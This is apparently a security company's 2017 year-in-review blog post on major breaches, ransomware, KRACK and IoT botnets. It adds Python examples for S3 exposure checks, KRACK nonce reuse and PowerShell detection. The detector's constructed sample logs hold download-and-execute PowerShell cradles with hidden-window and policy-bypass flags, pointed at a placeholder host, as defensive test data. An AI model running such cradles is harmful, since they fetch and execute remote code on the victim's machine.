The year in cyber security
We are nearing the end of 2017, and a lot has happened in cyber security. One observation is that people have come to accept cyber security incidents and the connected risks as something that will naturally happen. We will see whether this leads to more consolidated efforts to strengthen security posture, or whether people get overwhelmed by the sheer number of attacks and risks they are exposed to.
Quick facts about 2017
- More than 530 publicly disclosed data breaches (source), with Equifax being one of the biggest (143 million records)
- Ransomware strikes back, including WannaCry, Petya/NotPetya and BadRabbit. The damage is up 15x in two years, as global damages are expected to exceed $5 billion in 2017
- New botnets and IoT botnets on the rise, for example Reaper
- Breach data shows a new way of influencing votes and elections, with two massive breaches exposing US voter data collected during campaigns
A timeline of events
_February 2017 - Cloudbleed
The year started with a very interesting bug in the infrastructure of Cloudflare, the content delivery specialist that offers CDN, DDoS protection, a cloud web application firewall and reverse proxying. Cloudbleed was a buffer overrun in an HTML parser running on Cloudflare's edge servers: under certain conditions the parser read past the end of its buffer, and the response sent to a visitor then contained uninitialised server memory holding data from other customers' HTTP sessions, such as cookies, authentication tokens and POST bodies. In effect it resembled Heartbleed (memory disclosed to anyone who asked), although the root cause was different. Leaked pages were also crawled and cached by search engines, which made the clean-up considerably harder. Affected Cloudflare customers included Fitbit, Uber and OKCupid.
_April 2017 - Shadow Brokers
The Shadow Brokers is the name of a hacker group that first appeared in August 2016 with the famous, but unsuccessful, online auction of NSA tools called the "Equation Group Cyber Weapons Auction". It was aimed at government sponsors of cyber warfare and tried to sell NSA tooling to other organisations. A notable detail was the auction format: bids were not refunded, so anyone who was outbid simply lost their money. Consequently the auction was not a success.
The group leaked more tools and exploits in late 2016 and early 2017 before releasing, in April 2017, the dump containing the EternalBlue exploit that was used in several of the ransomware attacks covered in this post. Rumours suggested that the Shadow Brokers might be an insider from NSA's Tailored Access Operations, or that the group is linked to Russia.
_May 2017 - WannaCry
This family of ransomware struck worldwide in May 2017. It infected more than 230,000 computers in over 150 countries (Source). Big names and organisations were affected, like Deutsche Bahn, Telefónica, FedEx, Maersk and the British National Health Service.
Early reports attributed the initial WannaCry infections to phishing emails, but no email vector was ever confirmed; the hosts that were hit had a vulnerable SMBv1 service (TCP port 445) reachable either from the internet or from an already infected machine. Once on a host, the ransomware encrypted local and network drives, as we have seen in many other attacks. This time, however, it also spread on its own: it scanned for further hosts running the vulnerable service and exploited them, classic worm-style lateral movement and propagation. WannaCry is remarkable because it used the EternalBlue exploit (together with the DoublePulsar kernel backdoor) that was part of the files leaked by the Shadow Brokers.
The attack was widespread but could have been worse without a kill switch built into the malware (whether on purpose or by accident is not known): before doing anything else, each sample tried to reach a hard-coded, unregistered domain and exited if the request succeeded. Marcus Hutchins, also known as @MalwareTech on Twitter, spotted the domain and registered it, which sinkholed new infections. WannaCry, and especially its propagation in internal networks, would have been avoidable if organisations had put more effort into patch management: the corresponding patch, MS17-010, had been released two months earlier, in March 2017. Patch management and timely updating of critical assets remain among the most effective ways to protect your organisation from security incidents, breaches and ransomware.
_June 2017 - Voter data exposed on a misconfigured server
A trivial misconfiguration led to the exposure of personal details of nearly 200 million US voters: the data sat in an internet-facing Amazon S3 storage bucket that allowed anyone to list and download it, without any authentication. The data had been compiled for the Republican National Committee by a contractor, Deep Root Analytics, for voter analytics: the purpose was to predict individual voters' patterns and behaviours and to target them during the 2016 Trump campaign.
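The misconfiguration behind this kind of exposure is usually visible in two places: the bucket's access control list and its bucket policy. The check below is an added example (not Deep Root's or Cloudflare's code) that flags the two grants that make a bucket world-readable; the ACL and policy documents are constructed, following the shape that `aws s3api get-bucket-acl` and `aws s3api get-bucket-policy` return, and the account id in the hardened policy is hypothetical.

```python
"""Flag an S3 bucket that is readable by the whole internet, from its ACL and bucket policy.

Added example; the JSON documents below are constructed and follow the shape
returned by `aws s3api get-bucket-acl` and `aws s3api get-bucket-policy`.
"""

# Predefined S3 grantee groups: "everyone" and "any AWS account", respectively.
ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTH_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"


def acl_findings(acl: dict) -> list:
    """Return one finding per ACL grant that hands out rights to a public group."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") != "Group":
            continue
        if grantee.get("URI") == ALL_USERS:
            findings.append(f"ACL grants {grant['Permission']} to everyone (AllUsers)")
        elif grantee.get("URI") == AUTH_USERS:
            findings.append(f"ACL grants {grant['Permission']} to any AWS account (AuthenticatedUsers)")
    return findings


def _is_wildcard_principal(principal) -> bool:
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws == "*" or (isinstance(aws, list) and "*" in aws)
    return False


def policy_findings(policy: dict) -> list:
    """Return one finding per Allow statement open to every principal without a Condition."""
    findings = []
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow" or stmt.get("Condition"):
            continue
        if not _is_wildcard_principal(stmt.get("Principal")):
            continue
        actions = stmt.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        findings.append(f"policy allows {', '.join(actions)} to Principal * without Condition")
    return findings


def assess(acl: dict, policy: dict) -> list:
    """All public-access findings for one bucket."""
    return acl_findings(acl) + policy_findings(policy)


OWNER = {"Type": "CanonicalUser", "ID": "0" * 64}  # constructed owner id

# Constructed: the kind of ACL that makes a bucket listable by anyone on the internet.
EXPOSED_ACL = {
    "Grants": [
        {"Grantee": OWNER, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},
    ]
}
# Constructed: a policy that lets anyone fetch any object.
EXPOSED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::example-analytics-bucket/*"}
    ],
}

# Constructed hardened equivalents: owner only, plus one named role (hypothetical account id).
HARDENED_ACL = {"Grants": [{"Grantee": OWNER, "Permission": "FULL_CONTROL"}]}
HARDENED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/analytics-reader"},
         "Action": ["s3:GetObject", "s3:ListBucket"],
         "Resource": ["arn:aws:s3:::example-analytics-bucket",
                      "arn:aws:s3:::example-analytics-bucket/*"]}
    ],
}

if __name__ == "__main__":
    for name, acl, pol in (("exposed", EXPOSED_ACL, EXPOSED_POLICY),
                           ("hardened", HARDENED_ACL, HARDENED_POLICY)):
        print(name, assess(acl, pol) or ["no public access found"])
```

Two simplifications to keep in mind: the check treats any `Condition` as sufficient scoping, although a weak condition can still leave a wildcard statement effectively public, and it does not evaluate `Deny` statements or object-level ACLs, so a clean result here is necessary but not sufficient.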
_June 2017 - Petya/NotPetya
The outbreak that started on 27 June 2017 in Ukraine reused the boot-sector loader of the 2016 Petya ransomware and was therefore soon named NotPetya. Infections were also reported from France, Germany, Italy, the UK and the US, but most victims were in Ukraine and Russia. This is largely because the initial distribution went through the update mechanism of M.E.Doc, a tax accounting software used by most companies doing business in Ukraine: a software supply-chain compromise. Like Petya, the malware overwrites the master boot record (MBR) and forces a reboot; the fake CHKDSK screen shown on restart is actually the encryption of the disk's master file table, after which a bitcoin ransom note is displayed.
Inside a network NotPetya spread with the EternalBlue exploit mentioned in the WannaCry section and the related EternalRomance SMB exploit, and, on patched machines, with credentials harvested from memory and legitimate remote-execution tools (PsExec and WMIC). That is why fully patched hosts were hit as well. Because the encryption key was not recoverable even after payment, NotPetya is generally regarded as a wiper disguised as ransomware.
_August 2017 - WikiLeaks CIA Vault 7
WikiLeaks has been publishing Vault 7, a series of documents attributed to the CIA, in instalments since March 2017; the August release is the one covered here. The documents describe tooling for cyber operations carried out by the CIA and give great insight into state-sponsored attack capabilities. It is clear how operations are structured and that we are facing a highly organised workforce: exploit developers, operations specialists, documentation and user guides all point to a sophisticated organisation. One of the most interesting parts of the August release is Angelfire, a so-called implant for Windows made of several components: it modifies the partition boot sector to load its own driver at boot, hides its files in a covert file system and injects its payloads into legitimate processes, which keeps it out of sight of ordinary file-based inspection.
_September 2017 - Equifax
One of the biggest and most serious breaches of the year took place between mid-May and the end of July 2017 and was made public only on 7 September 2017. Equifax, a US consumer credit reporting agency, collects information on over 800 million consumers and more than 88 million businesses worldwide (Source). That means Equifax holds a myriad of personally identifiable information: social security numbers, names, addresses and, most importantly, credit data. The entry point was a vulnerability in the Apache Struts web framework (CVE-2017-5638) for which a patch had been available since March 2017, the same pattern of a publicly known, unpatched vulnerability seen with WannaCry.
The breach included data of over 140 million US consumers, up to 44 million UK consumers and around 8,000 Canadians: names, social security numbers and driver's licence numbers, but also credit card numbers and dispute documents linked to individual consumers' credit records. The Equifax breach is a textbook example of failed incident response and of poor communication towards the public. Furthermore, three top Equifax executives sold stock worth about 1.8 million USD after the breach had been discovered internally and before it was made public.
_September 2017 - Deloitte breach
Consulting company Deloitte suffered a serious breach of its global email system, affecting the mailboxes of around 244,000 staff. The attackers reportedly got in through an administrator account protected by a single password and no two-factor authentication, and had access from as early as October 2016, which shows how long attackers can sit in a network without being noticed. Emails exchanged with high-profile clients were exposed as well, reportedly including the US Department of Defense, the Department of Homeland Security and the US State Department, as well as the mortgage giants Fannie Mae and Freddie Mac.
_October 2017 - BadRabbit
BadRabbit was another ransomware campaign that mainly affected Russia and Ukraine. The initial vector was a fake Adobe Flash installer, served via compromised news websites, that victims had to run manually. Once inside a network it spread over SMB using a list of common credentials, credentials dumped from memory and the EternalRomance exploit. Affected organisations included the Odessa airport, the Kiev metro and the Ukrainian ministry of infrastructure, as well as the Russian news agency Interfax.
_October 2017 - KRACK
KRACK (Key Reinstallation Attacks) is a set of attacks on the WPA2 four-way handshake, published by Mathy Vanhoef. An attacker within radio range who can sit between client and access point blocks the client's final handshake message, so the access point retransmits message 3. The client then reinstalls the pairwise key it is already using and, as a side effect, resets the transmit packet number (the nonce) and the receive replay counter. Because WPA2's encryption (CCMP, GCMP) is a counter-mode construction, reusing a nonce under the same key reuses keystream: the attacker can decrypt and replay frames and, in the GCMP case, forge them. Some versions of wpa_supplicant, used on Linux and on Android 6.0 and later, even installed an all-zero key, which makes decryption trivial. Contrary to some reporting, the attack does not recover the Wi-Fi password or the pairwise key itself; the fix is a client (and access point) patch that refuses to reset the nonce on reinstallation, not a new password.
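Why resetting a nonce is enough to break confidentiality, as an added example that is not part of the original post or of the KRACK research code: a toy station installs a key, sends a frame, is tricked into reinstalling the same key, and sends a second frame under the same nonce. The keystream generator is an HMAC-SHA256 stand-in for the AES counter mode inside CCMP (so the script needs only the standard library), and the two frames and the key are constructed; the XOR relation it demonstrates holds for the real cipher as well.

```python
"""Why a reinstalled key is dangerous: nonce reuse turns a stream cipher into XOR of plaintexts.

Added example. keystream() is a stand-in for the AES-CTR core of CCMP, built from
HMAC-SHA256 so the script runs with the standard library only; what matters is the
station model: a key plus a packet number that must never repeat under that key.
"""
import hashlib
import hmac


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Deterministic keystream: block i = HMAC(key, nonce || i). Same key and nonce, same stream."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def xor_encrypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    return bytes(p ^ k for p, k in zip(data, keystream(key, nonce, len(data))))


class Station:
    """Toy Wi-Fi client: the pairwise key plus the 48-bit packet number used as nonce."""

    def __init__(self, ptk: bytes):
        self.install_key(ptk)

    def install_key(self, ptk: bytes):
        # Installing a key resets the packet number to 0. Correct for a fresh key, and
        # exactly the problem when a replayed handshake message 3 makes the client
        # install the *same* key a second time.
        self.ptk = ptk
        self.pn = 0

    def send(self, plaintext: bytes):
        nonce = self.pn.to_bytes(6, "big")
        self.pn += 1
        return nonce, xor_encrypt(self.ptk, nonce, plaintext)


def recover_with_known_plaintext(ct_known: bytes, pt_known: bytes, ct_target: bytes) -> bytes:
    """If both ciphertexts used the same keystream: c1 ^ c2 = p1 ^ p2, so p2 = c1 ^ c2 ^ p1."""
    n = min(len(ct_known), len(pt_known), len(ct_target))
    return bytes(a ^ b ^ c for a, b, c in zip(ct_known[:n], ct_target[:n], pt_known[:n]))


FRAME_1 = b"GET /login HTTP/1.1\r\nHost: intranet\r\n"  # constructed; assumed known to the attacker
FRAME_2 = b"POST /login user=admin&pw=hunter2"          # constructed; the secret to recover


def demo(replay_message_3: bool) -> dict:
    """Send two frames, with or without a forced key reinstallation in between."""
    ptk = hashlib.sha256(b"constructed-pairwise-key").digest()
    sta = Station(ptk)
    n1, c1 = sta.send(FRAME_1)
    if replay_message_3:
        sta.install_key(ptk)  # the attacker made the client reinstall the key in use
    n2, c2 = sta.send(FRAME_2)
    return {
        "nonce_reused": n1 == n2,
        "recovered": recover_with_known_plaintext(c1, FRAME_1, c2),
    }


if __name__ == "__main__":
    for replay in (False, True):
        r = demo(replay)
        print("replay " if replay else "normal ", r["nonce_reused"], r["recovered"])
```

In the real attack the known plaintext comes from predictable protocol headers rather than a captured login, and the all-zero-key variant on affected wpa_supplicant builds needs no known plaintext at all. The defence is on the receiving end of message 3: once a key is installed, a retransmitted message 3 must be acknowledged without touching the key or the counters.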
_October 2017 - The Reaper IoT botnet
The Reaper botnet (also called IoTroop) is a successor of Mirai, a variant of which knocked roughly 900,000 Deutsche Telekom (DTAG) customer routers offline in November 2016. Where Mirai logged into devices with default passwords, Reaper exploits known vulnerabilities in the devices' web interfaces. Targets include routers from D-Link and Netgear, but also IP cameras from Vacron and other vendors.
The malware running on infected devices has an integrated Lua scripting environment, which makes it much easier to use the botnet for attacks more advanced than plain flooding. In October 2017 researchers at Arbor Networks estimated the active botnet at only 10,000 to 20,000 devices, with an additional pool of around 2 million potential hosts that are susceptible to the same vulnerabilities.
_November 2017 - Uber
The ride-sharing company Uber suffered from a badly handled breach disclosure in November. The breach itself dates back to October 2016 and exposed the names, email addresses and phone numbers of 57 million riders and drivers worldwide, plus the driver's licence numbers of around 600,000 US drivers. The attackers reportedly found credentials for Uber's Amazon Web Services account in a private GitHub repository used by Uber engineers and downloaded the data from Uber's cloud storage with them. Uber kept the incident quiet for about a year and paid the hackers 100,000 USD to delete the stolen data and stay silent.
We see a couple of trends in the cyber security landscape that will probably play a major role in 2018. Here are a few things we think will become relevant next year:
_Fileless attacks with PowerShell
In recent years Windows command-line and system automation got a huge boost from PowerShell, which is, as the name implies, very powerful. It bears no resemblance to the old batch files we ran at the command prompt and cursed for their odd syntax compared to Unix shells. Meanwhile criminals use PowerShell to compromise systems. The initial infection still happens through a malicious document, a drive-by download or a targeted attack. However, no malware binary needs to be written to disk; instead PowerShell itself carries out reconnaissance, establishes persistence, exfiltrates data or moves laterally, typically as a one-liner that downloads and executes the next stage straight in memory, often passed as a base64-encoded command so that nothing readable shows up in the process command line. Because the only executable involved is a signed Microsoft binary, file-based antivirus has little to look at; logging and inspecting PowerShell command lines and script blocks is the more useful control.
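What that inspection looks like in practice, as an added example that is not part of the original post: a scorer that runs over process command lines, recognises the usual launch flags, decodes a `-EncodedCommand` payload (base64 over UTF-16LE, which is what PowerShell expects) and scores the decoded content as well, so the download cradle hidden inside the blob is caught. The log lines are constructed to resemble process-creation telemetry (Sysmon event 1 or Windows event 4688 with command-line auditing) and are not real data; `example.invalid` is a placeholder host.

```python
"""Spot fileless PowerShell abuse in process command lines, including -EncodedCommand payloads.

Added example. The log lines below are constructed to resemble process-creation
telemetry (Sysmon event 1, or Windows event 4688 with command-line auditing).
"""
import base64
import re


def encode_command(script: str) -> str:
    """Produce a -EncodedCommand value the way PowerShell expects it: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> str:
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


# PowerShell accepts any unambiguous prefix of -EncodedCommand, so match the short forms too.
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "bypass_policy": re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I),
    "no_profile": re.compile(r"-nop\b|-noprofile\b", re.I),
    "download_cradle": re.compile(r"Net\.WebClient|DownloadString|Invoke-WebRequest|\biwr\b", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "inline_base64": re.compile(r"FromBase64String", re.I),
}


def analyze_line(line: str) -> dict:
    """Score one command line; decode an encoded command and score its contents as well."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(line)}
    decoded = None
    m = ENCODED_FLAG.search(line)
    if m:
        hits.add("encoded_command")
        try:
            decoded = decode_encoded_command(m.group(1))
        except (ValueError, UnicodeDecodeError):
            decoded = None  # not valid base64/UTF-16LE; the flag hit alone is still worth keeping
        else:
            hits.update(f"decoded:{n}" for n, rx in INDICATORS.items() if rx.search(decoded))
    return {"score": len(hits), "indicators": sorted(hits), "decoded": decoded}


CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"

SAMPLE_LOGS = [
    # constructed: download cradle hidden behind an encoded command, typical macro payload
    "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand " + encode_command(CRADLE),
    # constructed: ordinary administration
    'powershell.exe -Command "Get-ChildItem C:\\Users | Measure-Object"',
    # constructed: the same cradle in clear text
    "powershell.exe -nop -w hidden -c \"IEX ((New-Object Net.WebClient).DownloadString('http://example.invalid/b'))\"",
]

if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        r = analyze_line(line)
        print(r["score"], r["indicators"], (r["decoded"] or "")[:60])
```

Regexes over the command line are a first tier only: attackers break up strings, use backticks and aliases, or nest several layers of encoding. PowerShell 5's script block logging (event 4104) records the code after the engine has de-obfuscated it, so the same indicators applied to those events catch far more, and the `-EncodedCommand` decoding above is the step that most often turns an opaque blob into something a rule can match.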
_Breaches reach system-critical impact
Equifax proves that a breach can have critical impact. Not only are enormous amounts of personally identifiable data lost, but also financial data and social security numbers, which, unlike a password, cannot simply be reset.
_IoT becomes a major target
IoT infrastructure, be it consumer-grade hardware or industrial IoT devices, will become a major target. We already saw this in IoT botnets like Reaper and Mirai, and will see more sophisticated attacks from such botnets next year.
_The hypervisor apocalypse
This is something that might happen, or might not, but it seems to be one of the biggest threats to the many, many services running on Amazon or Azure. Imagine someone exploiting a guest OS to break out into the hypervisor, and that being exploited in the wild. There have been hints in the past that this is possible, and cloud providers have, of course, done a great job of mitigating and patching such issues immediately.
_Cryptocurrencies
Cryptocurrencies, wallets and the blockchain are getting more and more commercialised. It is easy to predict that parts of that infrastructure will see increased exposure to attacks as more and more money flows through cryptocurrencies.
The _cyel team wishes all you guys a Happy Christmas and a great start into 2018.
_cyel is the leader in Moving Target Security. We provide a Moving Target Defence solution called _equilibrium that offers a fundamental solution to the network security problem. We move, distribute and conceal the targets. Instead of trying to prevent intrusions into a static network, the network becomes a dynamic system with moving targets. Endpoints are no longer easily visible to the outside world. Every data transmission is inspected and then encrypted. Lateral movement is limited. Violations are reported. We enable zero-trust networking.
For more information on _cyel and _equilibrium, and on a new way to segment your network and protect your assets, contact us: firstname.lastname@example.org or +41 31 522 12 20